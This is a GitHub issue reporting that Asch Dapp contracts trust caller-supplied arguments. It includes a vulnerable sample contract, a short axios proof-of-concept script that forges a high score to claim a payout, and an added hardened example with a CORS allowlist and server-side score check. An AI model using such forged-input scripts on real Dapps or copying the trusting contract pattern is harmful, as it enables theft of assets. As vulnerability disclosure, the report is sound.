
Contracts insecure due to same-origin policy

Open · bassjobsen opened this issue 7 years ago · 1 comment

As far as I understand, a Dapp runs on an Express server with the cors middleware enabled; see also https://github.com/AschPlatform/asch/blob/master/src/init.js#L166.

As already described at https://github.com/bassjobsen/howto-asch-docs/blob/master/use-assets.md, and asked at https://stackoverflow.com/questions/51603087/how-to-guarantee-that-the-input-of-the-smart-contract-is-not-manipulated, PUT requests (and likewise POST, GET, etc.) to the Dapp are allowed from anywhere.

The above means that input values for the (smart) contract of a Dapp can be manipulated.

For instance, my contract winner.js may look like:

module.exports = {
  winner: async function(score) {
    // `score` arrives straight from the transaction args, so the caller chooses it
    if (score > 100) {
      // pay the user some assets because his score is higher than 100
    }
  }
}

Now everyone can run the following script to get some assets and be a winner:

const axios = require('axios');
const fee = '10000000';
const data = {
  secret: "acquire paper fun spice celery design able shrimp lunch angry alter gather",
  fee: fee,
  type: 1001, // the number for winner.winner
  args: 1000  // a very high score
};
axios.put('http://localhost:4096/api/dapps/ee0c22de321610bbc5698243d66f5122a20d2b1b1d534ee4f636165e1b6cd6f6/transactions/unsigned', data)
  .then(function (response) {
    console.log(response.data);
  })
  .catch(function (error) {
    console.log(error);
  })
  .then(function () {
    // always executed
  });

I believe that CORS can be useful for testing purposes, but it should be disabled for production (mainnet) at least.

bassjobsen · Jul 31 '18 10:07
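Added example (not code from the asch project or from the issue author) showing the two defensive changes the report points at. Two points are worth separating: a restrictive CORS policy stops a malicious web page in a victim's browser from driving the Dapp API, but it does nothing against a script like the one above, which runs in Node and never sees CORS at all. So the contract itself must not trust a caller-supplied score. The code below models both: an origin check that only answers an allowlist (the default `cors()` middleware reflects any origin), and a `winner` handler that decides the payout from a score the Dapp itself recorded rather than from the transaction args. `ALLOWED_ORIGINS`, `corsHeadersFor`, `permissiveCorsHeaders`, `recordScore`, `winner` and the sample origin and sender names are assumptions for this example, not asch APIs; the real fix would live in asch-sandbox's transaction handling.

```javascript
// Added example: allowlisted CORS check plus a contract that does not trust
// caller-supplied args. All names and values here are constructed, not asch's.

// Constructed allowlist: only the Dapp's own front end may call the API
// from a browser. Anything else gets no Access-Control-Allow-Origin header.
const ALLOWED_ORIGINS = new Set(['https://dapp.example.test']);

// Equivalent of `cors()` with no options: reflects a wildcard, so any page
// on the web can read responses from the Dapp API. This is the weak setting.
function permissiveCorsHeaders() {
  return { 'Access-Control-Allow-Origin': '*' };
}

// Hardened variant of the origin check: returns the headers to emit for the
// request's Origin, or null when the origin is not on the allowlist (the
// browser then refuses to expose the response to the calling page).
function corsHeadersFor(origin) {
  if (typeof origin !== 'string' || !ALLOWED_ORIGINS.has(origin)) return null;
  return {
    'Access-Control-Allow-Origin': origin,
    'Vary': 'Origin', // caches must not reuse one origin's answer for another
  };
}

// Server-side record of scores the Dapp observed itself (for instance written
// by an earlier transaction the Dapp validated). Keyed by sender address.
const observedScores = new Map();

function recordScore(sender, score) {
  if (typeof sender !== 'string' || sender.length === 0) throw new Error('invalid sender');
  if (!Number.isInteger(score) || score < 0) throw new Error('invalid score');
  observedScores.set(sender, score);
}

// Hardened version of the issue's winner contract. The payout decision uses
// only the recorded score; the caller's claimed score is checked against it
// and a mismatch is rejected, so a forged `args` value buys nothing.
function winner(sender, claimedScore) {
  const recorded = observedScores.get(sender);
  if (recorded === undefined) {
    return { paid: false, reason: 'no recorded score for sender' };
  }
  if (claimedScore !== recorded) {
    return { paid: false, reason: 'claimed score does not match recorded score' };
  }
  if (recorded > 100) {
    return { paid: true, amount: 1 }; // constructed payout amount
  }
  return { paid: false, reason: 'score not above 100' };
}

// Walk-through with constructed data: the forged claim from the issue fails,
// a genuine recorded score above 100 is paid.
function demo() {
  recordScore('sender-A', 150);
  return {
    forged: winner('sender-A', 1000),
    genuine: winner('sender-A', 150),
    unknownSender: winner('sender-B', 1000),
    blockedOrigin: corsHeadersFor('https://attacker.example.test'),
    allowedOrigin: corsHeadersFor('https://dapp.example.test'),
  };
}
```

The `demo()` call shows the contrast: the same request that paid out in the report's contract is refused here because the Dapp, not the client, is the source of truth for the score. The CORS allowlist is still worth applying on mainnet, but as a browser-side mitigation only.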

That's a very important security issue. We need to remove it in asch-sandbox @sqfasd

liangpeili · Sep 06 '18 09:09